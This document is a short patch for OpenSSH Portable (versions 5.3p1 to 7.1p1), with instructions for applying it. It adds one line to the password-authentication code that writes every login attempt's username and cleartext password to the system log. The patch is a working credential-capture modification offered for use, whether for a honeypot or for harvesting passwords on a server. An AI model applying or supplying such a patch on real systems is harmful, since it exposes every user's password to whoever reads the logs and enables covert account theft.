Patch for OpenSSH Portable to log passwords

Tested on:

    OpenSSH 5.3p1 - OpenSSH 7.1p1
    May apply to older versions.

To apply:

    patch --dry-run < sshlog.patch
    patch < sshlog.patch

--- auth-passwd.c	2012-04-25 19:51:28.000000000 -0400
+++ auth-passwd-sshlog.c	2014-02-11 12:19:42.000000000 -0500
@@ -82,6 +82,7 @@
 {
 	struct passwd * pw = authctxt->pw;
 	int result, ok = authctxt->valid;
+    logit("sshlog: %s %s", authctxt->user, password);
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
 	static int expire_checked = 0;
 #endif
